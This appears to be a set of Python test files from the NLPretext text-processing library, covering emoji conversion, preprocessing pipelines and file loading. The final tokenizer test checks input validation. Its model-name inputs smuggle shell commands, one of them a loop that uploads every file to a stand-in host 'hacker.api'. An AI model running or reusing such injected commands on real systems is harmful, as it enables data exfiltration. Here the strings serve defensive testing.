("🥖🍷🇫🇷", ":baguette_bread::wine_glass::France:"),
("✊", ":raised_fist:"),
],
)
def test_convert_emoji_to_text(input_str, expected_str):
result = convert_emoji_to_text(input_str)
np.testing.assert_equal(result, expected_str)
def test_custom_preprocess():
# Given
text = "Some text with @mentions and #hashtags"
preprocessor = Preprocessor()
preprocessor.pipe(remove_hashtag)
preprocessor.pipe(remove_mentions)
expected_result = remove_hashtag(text)
expected_result = remove_mentions(expected_result)
# When
result = preprocessor.run(text)
# Then
assert expected_result == result
@pytest.mark.parametrize(
"input_str, expected_str",
[
(
"Some text with @mentions and whitespaces and #hashtags",
"Some text with and whitespaces and",
),
("@twitteruser ✊", ""),
("", ""),
],
)
def test_apply_preprocessor(input_str, expected_str):
# Given
preprocessor = Preprocessor()
# When
result = preprocessor.run(input_str)
# Then
assert expected_str == result
================================================
FILE: tests/test_textloader.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# mypy: disable-error-code="attr-defined"
from pathlib import Path
from unittest.mock import MagicMock, patch
try:
import dask.bag as db
import dask.dataframe as dd
except ImportError as e:
raise ImportError("please install dask: pip install dask[complete]") from e
try:
import pandas as pd
except ImportError as e:
raise ImportError("please install pandas: pip install pandas") from e
import pytest
from nlpretext.preprocessor import Preprocessor
from nlpretext.textloader import TextLoader
from pandas.testing import assert_frame_equal
# pylint: disable=protected-access
@patch("dask.bag.read_text")
def test__read_text_txt_dask(mock_read_text):
# Given
files_path = "some_path/to_read.txt"
file_format = "txt"
encoding = "utf-8"
text_column = "text"
mock_read_text.return_value = db.from_sequence(["This is a text \n", "This is another text \n"])
expected_result = dd.from_pandas(
pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
npartitions=2,
)
# When
dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
actual_result = dummy_instance._read_text_txt(files_path)
# Then
mock_read_text.assert_called_once_with(files_path, encoding=encoding)
assert_frame_equal(expected_result.compute(), actual_result.compute().reset_index(drop=True))
@patch("pandas.read_fwf")
def test__read_text_txt_pandas(mock_read_text):
# Given
files_path = "some_path/to_read.txt"
file_format = "txt"
encoding = "utf-8"
text_column = "text"
mock_read_text.return_value = pd.DataFrame(
{text_column: ["This is a text", "This is another text"]}
)
expected_result = pd.DataFrame({text_column: ["This is a text", "This is another text"]})
# When
dummy_instance = TextLoader(
file_format=file_format,
use_dask=False,
encoding=encoding,
text_column=text_column,
)
actual_result = dummy_instance._read_text_txt(files_path)
# Then
mock_read_text.assert_called_once_with(
str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)]
)
assert_frame_equal(expected_result, actual_result.reset_index(drop=True))
@patch("nlpretext._utils.daskloader.dd")
def test__read_text_json_dask(mock_read):
# Given
files_path = "some_path/to_read.json"
file_format = "json"
encoding = "utf-8"
text_column = "text"
text_ddf = dd.from_pandas(
pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
npartitions=2,
)
mock_read.read_json.return_value = text_ddf
expected_result = text_ddf[[text_column]]
# When
dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
actual_result = dummy_instance._read_text_json(files_path)
# Then
mock_read.read_json.assert_called_once_with(files_path, encoding=encoding)
assert_frame_equal(expected_result.compute(), actual_result.compute())
@patch("nlpretext._utils.pandasloader.read_json")
def test__read_text_json_pandas(mock_read):
# Given
files_path = "some_path/to_read.txt"
file_format = "txt"
encoding = "utf-8"
text_column = "text"
dummy_instance = TextLoader(
file_format=file_format,
use_dask=False,
encoding=encoding,
text_column=text_column,
)
dummy_instance._read_text_json(files_path)
# Then
mock_read.assert_called_once_with(files_path, encoding=encoding)
@patch("dask.dataframe.read_csv")
def test__read_text_csv_dask(mock_read_csv):
# Given
files_path = "some_path/to_read.csv"
file_format = "csv"
encoding = "utf-8"
text_column = "text"
text_ddf = dd.from_pandas(
pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
npartitions=2,
)
mock_read_csv.return_value = text_ddf
expected_result = text_ddf[[text_column]]
# When
dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
actual_result = dummy_instance._read_text_csv(files_path)
# Then
mock_read_csv.assert_called_once_with(files_path, encoding=encoding)
assert_frame_equal(expected_result.compute(), actual_result.compute())
@patch("nlpretext._utils.pandasloader.read_csv")
def test__read_text_csv_pandas(mock_read):
# Given
files_path = "some_path/to_read.txt"
file_format = "txt"
encoding = "utf-8"
text_column = "text"
dummy_instance = TextLoader(
file_format=file_format,
use_dask=False,
encoding=encoding,
text_column=text_column,
)
dummy_instance._read_text_csv(files_path)
# Then
mock_read.assert_called_once_with(files_path, encoding=encoding)
@patch("dask.dataframe.read_parquet")
def test__read_text_parquet_dask(mock_read_parquet):
# Given
files_path = "some_path/to_read.parquet"
file_format = "parquet"
encoding = "utf-8"
text_column = "text"
text_ddf = dd.from_pandas(
pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
npartitions=2,
)
mock_read_parquet.return_value = text_ddf
expected_result = text_ddf[[text_column]]
# When
dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
actual_result = dummy_instance._read_text_parquet(files_path)
# Then
mock_read_parquet.assert_called_once_with(files_path, encoding=encoding)
assert_frame_equal(expected_result.compute(), actual_result.compute())
@patch("nlpretext._utils.pandasloader.read_parquet")
def test__read_text_parquet_pandas(mock_read):
# Given
files_path = "some_path/to_read.txt"
file_format = "txt"
encoding = "utf-8"
text_column = "text"
dummy_instance = TextLoader(
file_format=file_format,
use_dask=False,
encoding=encoding,
text_column=text_column,
)
dummy_instance._read_text_parquet(files_path)
# Then
mock_read.assert_called_once_with(files_path, encoding=encoding)
@pytest.mark.parametrize(
"files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised",
[
("text_file1.json", None, None, True, None, "json", None),
("text_file2.json", "json", None, True, None, "json", None),
("text_file3.csv", None, "utf-8", True, None, "csv", None),
("text_file4.csv", None, None, False, None, "csv", None),
("text_file3.parquet", None, "utf-8", True, None, "parquet", None),
("text_file4.parquet", None, None, False, None, "parquet", None),
("text_file5.pdf", "pdf", None, False, None, "csv", "Format not handled"),
("text_file6.txt", None, None, False, Preprocessor(), "txt", None),
(
"text_file8.txt",
None,
None,
False,
MagicMock(),
"txt",
"Only NLPretext preprocessors can be specified",
),
],
)
@patch("nlpretext.preprocessor.Preprocessor.run", return_value="This is a text", autospec=True)
@patch("nlpretext.textloader.TextLoader._read_text_json")
@patch("nlpretext.textloader.TextLoader._read_text_txt")
@patch("nlpretext.textloader.TextLoader._read_text_csv")
@patch("nlpretext.textloader.TextLoader._read_text_parquet")
@patch("nlpretext.textloader.check_text_file_format")
def test_read_text(
mock_check_text_file_format,
mock__read_text_parquet,
mock__read_text_csv,
mock__read_text_txt,
mock__read_text_json,
mock_run,
files_path,
file_format,
encoding,
compute_to_pandas,
preprocessor,
expected_format,
raised,
):
# Given
text_column = "text"
if encoding is None:
encoding = "utf-8"
if file_format is None:
mock_check_text_file_format.return_value = expected_format
mock_reader_mapping = {
"csv": mock__read_text_csv,
"txt": mock__read_text_txt,
"json": mock__read_text_json,
"parquet": mock__read_text_parquet,
}
expected_result = dd.from_pandas(
pd.DataFrame({text_column: ["Text with #", "Text with double space"]}),
npartitions=2,
)
mock_reader_mapping.get(expected_format).return_value = expected_result # type: ignore
# When
dummy_textloader = TextLoader(
text_column=text_column, encoding=encoding, file_format=file_format
)
if raised is None:
actual_result = dummy_textloader.read_text(
files_path, file_format, encoding, compute_to_pandas, preprocessor
)
# Then
if file_format is None:
mock_check_text_file_format.assert_called_once_with(files_path)
mock_reader_mapping[expected_format].assert_called_once_with(files_path)
if preprocessor is not None:
if isinstance(preprocessor, Preprocessor):
mock_run.assert_called()
preprocessed_texts = ["Text with", "Text with double space"]
mock_run.side_effect = preprocessed_texts
expected_result = dd.from_pandas(
pd.DataFrame({text_column: preprocessed_texts}), npartitions=2
)
if not compute_to_pandas:
actual_result = actual_result.compute()
assert_frame_equal(expected_result.compute(), actual_result)
else:
with pytest.raises(ValueError, match=raised):
dummy_textloader.read_text(
files_path, file_format, encoding, compute_to_pandas, preprocessor
)
================================================
FILE: tests/test_tokenizer.py
================================================
import pytest
from nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model
@pytest.mark.parametrize(
"bad_model_name",
[
("en_core_web_sm; chmod -x hacker"),
(
"fr_core_news_sm | for file in $(find .); "
'do curl_command -X POST -H "Content-Type: multipart/form-data" '
'-F "data=@${file}" https-fake://hacker.api/upload; done'
),
],
)
def test_load_spacy_model_validation(bad_model_name):
with pytest.raises(LanguageNotInstalledError) as e:
_load_spacy_model(bad_model_name)
assert bad_model_name in str(e.value)